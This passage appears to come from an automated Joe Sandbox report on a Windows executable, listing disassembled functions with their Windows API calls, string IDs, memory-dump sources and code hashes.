                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                  • String ID: %s%s%u
                                                                                                  • API String ID: 110358324-1360425832
                                                                                                  • Opcode ID: 97f3a9baec5c63aa1362e700d27b71b9cf0810a1210da786715dee8bc2ad994f
                                                                                                  • Instruction ID: 3ff2bba907e6de2f814a84139aaa2554e4d7c7861b7381d3993ea09da66abb5c
                                                                                                  • Opcode Fuzzy Hash: 97f3a9baec5c63aa1362e700d27b71b9cf0810a1210da786715dee8bc2ad994f
                                                                                                  • Instruction Fuzzy Hash: DA41A0B1A4061CAADF209B90CC41FEE77BCEB45344F4080A6FA09E7191EB758E85DF61
                                                                                                  Function 0090BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _wcslen.LIBCMT ref: 0090BB27
                                                                                                  • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0090A275,?,?,00000800,?,0090A23A,?,0090755C), ref: 0090BBC5
                                                                                                  • _wcslen.LIBCMT ref: 0090BC3B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$CurrentDirectory
                                                                                                  • String ID: UNC$\\?\
                                                                                                  • API String ID: 3341907918-253988292
                                                                                                  • Opcode ID: f08a8bc9e9b8448b5372da9446c7b3415753fbfa5b424dd11f9b7ae570c357a5
                                                                                                  • Instruction ID: e5414c07bfd95badf1e3bf4c96f28f28bcf2448d35dd4a09079852d9d09feb28
                                                                                                  • Opcode Fuzzy Hash: f08a8bc9e9b8448b5372da9446c7b3415753fbfa5b424dd11f9b7ae570c357a5
                                                                                                  • Instruction Fuzzy Hash: 4341B43254022AAEEF21AF24CC01FEA77ADAF81390F108565F894A3191DBB5DED08B50
                                                                                                  Function 00927F6E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\hz7DzW2Yop.exe,00000104), ref: 00927FAE
                                                                                                  • _free.LIBCMT ref: 00928079
                                                                                                  • _free.LIBCMT ref: 00928083
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$FileModuleName
                                                                                                  • String ID: C:\Users\user\Desktop\hz7DzW2Yop.exe$`%t
                                                                                                  • API String ID: 2506810119-2735165847
                                                                                                  • Opcode ID: 7181e377e33efc890eee826acc383410daff759af31ebed83362214deb41eef3
                                                                                                  • Instruction ID: 51c3aa9d553fefa48d891dfb3311317a52109556aa97ac09c87aaea022fe474c
                                                                                                  • Opcode Fuzzy Hash: 7181e377e33efc890eee826acc383410daff759af31ebed83362214deb41eef3
                                                                                                  • Instruction Fuzzy Hash: F231C271A49228AFDB21DF95E880ADFBBFCEF85310F10406AF804A7215DB718E44CB91
                                                                                                  Function 0091B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadBitmapW.USER32(00000065), ref: 0091B6ED
                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0091B712
                                                                                                  • DeleteObject.GDI32(00000000), ref: 0091B744
                                                                                                  • DeleteObject.GDI32(00000000), ref: 0091B767
                                                                                                    • Part of subcall function 0091A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0091B73D,00000066), ref: 0091A6D5
                                                                                                    • Part of subcall function 0091A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0091B73D,00000066), ref: 0091A6EC
                                                                                                    • Part of subcall function 0091A6C2: LoadResource.KERNEL32(00000000,?,?,?,0091B73D,00000066), ref: 0091A703
                                                                                                    • Part of subcall function 0091A6C2: LockResource.KERNEL32(00000000,?,?,?,0091B73D,00000066), ref: 0091A712
                                                                                                    • Part of subcall function 0091A6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0091B73D,00000066), ref: 0091A72D
                                                                                                    • Part of subcall function 0091A6C2: GlobalLock.KERNEL32(00000000), ref: 0091A73E
                                                                                                    • Part of subcall function 0091A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0091A762
                                                                                                    • Part of subcall function 0091A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0091A7A7
                                                                                                    • Part of subcall function 0091A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0091A7C6
                                                                                                    • Part of subcall function 0091A6C2: GlobalFree.KERNEL32(00000000), ref: 0091A7CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                  • String ID: ]
                                                                                                  • API String ID: 1797374341-3352871620
                                                                                                  • Opcode ID: 20d7163f5bbdd4008efdfc9f44b72211b67f689054a92dde18da4962521ae95b
                                                                                                  • Instruction ID: 9122c4670d72a833b307a876ac9d56a6e958f1577af6288e7aa7264c4edef62f
                                                                                                  • Opcode Fuzzy Hash: 20d7163f5bbdd4008efdfc9f44b72211b67f689054a92dde18da4962521ae95b
                                                                                                  • Instruction Fuzzy Hash: 7401D236B4120967C7127B749D09BFF7ABE9FC1BA2F080014F910A7295DF758D8952A1
                                                                                                  Function 0091D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00901316: GetDlgItem.USER32(00000000,00003021), ref: 0090135A
                                                                                                    • Part of subcall function 00901316: SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
                                                                                                  • EndDialog.USER32(?,00000001), ref: 0091D64B
                                                                                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0091D661
                                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0091D675
                                                                                                  • SetDlgItemTextW.USER32(?,00000068), ref: 0091D684
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemText$DialogWindow
                                                                                                  • String ID: RENAMEDLG
                                                                                                  • API String ID: 445417207-3299779563
                                                                                                  • Opcode ID: ee6f4f158bae6cf2bc658f6382105f6895bdc89e73d188379ae826732d2b8540
                                                                                                  • Instruction ID: f3ca84a47a0ed359334510917c2d52c42da0bbe4719f0d8d478e2a6bca8f61af
                                                                                                  • Opcode Fuzzy Hash: ee6f4f158bae6cf2bc658f6382105f6895bdc89e73d188379ae826732d2b8540
                                                                                                  • Instruction Fuzzy Hash: F0014C3335E318BBD2114F649D09F9B775CEB9BB82F014414F345A20D0C7E29A48AB75
                                                                                                  Function 00927E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00927E24,00000000,?,00927DC4,00000000,0093C300,0000000C,00927F1B,00000000,00000002), ref: 00927E93
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00927EA6
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00927E24,00000000,?,00927DC4,00000000,0093C300,0000000C,00927F1B,00000000,00000002), ref: 00927EC9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: bc92fa935606c5ebcb3150735e36d329a166c45806dfc2b5b9592f93f588e8ad
                                                                                                  • Instruction ID: bea65607c88fd9fad57e2f3d8d6ac012ebc275b24f64c92fae88c56b42d295ac
                                                                                                  • Opcode Fuzzy Hash: bc92fa935606c5ebcb3150735e36d329a166c45806dfc2b5b9592f93f588e8ad
                                                                                                  • Instruction Fuzzy Hash: ABF06831A54218BBCB159FA4DC09B9EFFB9EF44715F0181A9F805A2270DB349E40DEA1
                                                                                                  Function 0090F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0091081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00910836
                                                                                                    • Part of subcall function 0091081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0090F2D8,Crypt32.dll,00000000,0090F35C,?,?,0090F33E,?,?,?), ref: 00910858
                                                                                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0090F2E4
                                                                                                  • GetProcAddress.KERNEL32(009481C8,CryptUnprotectMemory), ref: 0090F2F4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                  • API String ID: 2141747552-1753850145
                                                                                                  • Opcode ID: adad1c31a1ba6dbc943793cac93960888d343e519883b8b978a382cb78f2b83f
                                                                                                  • Instruction ID: d15557da43c528dc84f9e6b343514d42dec600ffa75758ce6538192a02d07af9
                                                                                                  • Opcode Fuzzy Hash: adad1c31a1ba6dbc943793cac93960888d343e519883b8b978a382cb78f2b83f
                                                                                                  • Instruction Fuzzy Hash: 70E026309A47019ECB309F38980CB017AD86F44704F00C86DF0DAD3690C6B9D1808F00
                                                                                                  Function 00922BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AdjustPointer$_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 2252061734-0
                                                                                                  • Opcode ID: b3da4da89dae7c12acf0f7096a15d00543006c0f61e951c798ac3383b6eeb505
                                                                                                  • Instruction ID: 7462d505dd7e322cc4499f76a96f3c702f546e001f4531f6cf2f67580081cda8
                                                                                                  • Opcode Fuzzy Hash: b3da4da89dae7c12acf0f7096a15d00543006c0f61e951c798ac3383b6eeb505
                                                                                                  • Instruction Fuzzy Hash: F151DE72601226BFEB29CF14F845BAA73A8FF94310F24456DEC45472A9E771ED80DB90
                                                                                                  Function 0092BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0092BF39
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0092BF5C
                                                                                                    • Part of subcall function 00928E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0092CA2C,00000000,?,00926CBE,?,00000008,?,009291E0,?,?,?), ref: 00928E38
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0092BF82
                                                                                                  • _free.LIBCMT ref: 0092BF95
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0092BFA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 336800556-0
                                                                                                  • Opcode ID: 7c68c17b9acd8e2d1a2c65c47a2811d91ada1a21d36ac6f00ff65a43053ec6c6
                                                                                                  • Instruction ID: 548d00d36c7fec9bcdd15158f22c9a5ed9d81c65314d34b8cca207823142f7e9
                                                                                                  • Opcode Fuzzy Hash: 7c68c17b9acd8e2d1a2c65c47a2811d91ada1a21d36ac6f00ff65a43053ec6c6
                                                                                                  • Instruction Fuzzy Hash: C901F77261AB317F232126B67D4DDBB6BADDEC2BA03154129F908C2149EF60CD0199B0
                                                                                                  Function 00929869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,?,009291AD,0092B188,?,00929813,00000001,00000364,?,00923F73,00000050,?,00941030,00000200), ref: 0092986E
                                                                                                  • _free.LIBCMT ref: 009298A3
                                                                                                  • _free.LIBCMT ref: 009298CA
                                                                                                  • SetLastError.KERNEL32(00000000,?,00941030,00000200), ref: 009298D7
                                                                                                  • SetLastError.KERNEL32(00000000,?,00941030,00000200), ref: 009298E0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3170660625-0
                                                                                                  • Opcode ID: f5f8c4f99974612f773f664e795eb07ca1685db8dcd12802300596f994a974f3
                                                                                                  • Instruction ID: 6a47fe6af5b776f6934498ac556187b8bf95c114572badf20fa0882afe99d76e
                                                                                                  • Opcode Fuzzy Hash: f5f8c4f99974612f773f664e795eb07ca1685db8dcd12802300596f994a974f3
                                                                                                  • Instruction Fuzzy Hash: 350128371586317BD3163334BC89B1B266DEFD3770F290534F515921DAEE348C066561
                                                                                                  Function 00910EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 009111CF: ResetEvent.KERNEL32(?), ref: 009111E1
                                                                                                    • Part of subcall function 009111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 009111F5
                                                                                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00910F21
                                                                                                  • CloseHandle.KERNEL32(?,?), ref: 00910F3B
                                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00910F54
                                                                                                  • CloseHandle.KERNEL32(?), ref: 00910F60
                                                                                                  • CloseHandle.KERNEL32(?), ref: 00910F6C
                                                                                                    • Part of subcall function 00910FE4: WaitForSingleObject.KERNEL32(?,000000FF,00911206,?), ref: 00910FEA
                                                                                                    • Part of subcall function 00910FE4: GetLastError.KERNEL32(?), ref: 00910FF6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1868215902-0
                                                                                                  • Opcode ID: 984a978c201e029233b058ca8cb9e18fa259de16167533a22badb9b28872103e
                                                                                                  • Instruction ID: 9252c9899ba2ac775d4f84f533eda4e700bf67e865bc6c36629ba45554154995
                                                                                                  • Opcode Fuzzy Hash: 984a978c201e029233b058ca8cb9e18fa259de16167533a22badb9b28872103e
                                                                                                  • Instruction Fuzzy Hash: 8D01F176544B04FFC7229B64DC85BC6FBA9FB48710F004829F26B92160CBB67A81DF50
                                                                                                  Function 0092C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 0092C817
                                                                                                    • Part of subcall function 00928DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?), ref: 00928DE2
                                                                                                    • Part of subcall function 00928DCC: GetLastError.KERNEL32(?,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?,?), ref: 00928DF4
                                                                                                  • _free.LIBCMT ref: 0092C829
                                                                                                  • _free.LIBCMT ref: 0092C83B
                                                                                                  • _free.LIBCMT ref: 0092C84D
                                                                                                  • _free.LIBCMT ref: 0092C85F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: d97b39149886f059d53471229a58e5292a76d957f0f141a4eefafa02ce3a4e95
                                                                                                  • Instruction ID: e3ad6e5f2ab596ffedb9615d894622ab0c148ad627110a0f2d9de2994604cd3a
                                                                                                  • Opcode Fuzzy Hash: d97b39149886f059d53471229a58e5292a76d957f0f141a4eefafa02ce3a4e95
                                                                                                  • Instruction Fuzzy Hash: 60F01D72519220AB9630EB68F88AD1B73EDAA40714B645C19F109D75EACB70FC80CA65
                                                                                                  Function 00911FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _wcslen.LIBCMT ref: 00911FE5
                                                                                                  • _wcslen.LIBCMT ref: 00911FF6
                                                                                                  • _wcslen.LIBCMT ref: 00912006
                                                                                                  • _wcslen.LIBCMT ref: 00912014
                                                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0090B371,?,?,00000000,?,?,?), ref: 0091202F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$CompareString
                                                                                                  • String ID:
                                                                                                  • API String ID: 3397213944-0
                                                                                                  • Opcode ID: 7e01d72dfccbe38e7bb811727072b0829f5242249dd24456fa449c0e368e48f9
                                                                                                  • Instruction ID: 2a4bf6f8a67ff3dac0d3025e5fadbe7b6631377f0e8d9c92a14288a1633085cb
                                                                                                  • Opcode Fuzzy Hash: 7e01d72dfccbe38e7bb811727072b0829f5242249dd24456fa449c0e368e48f9
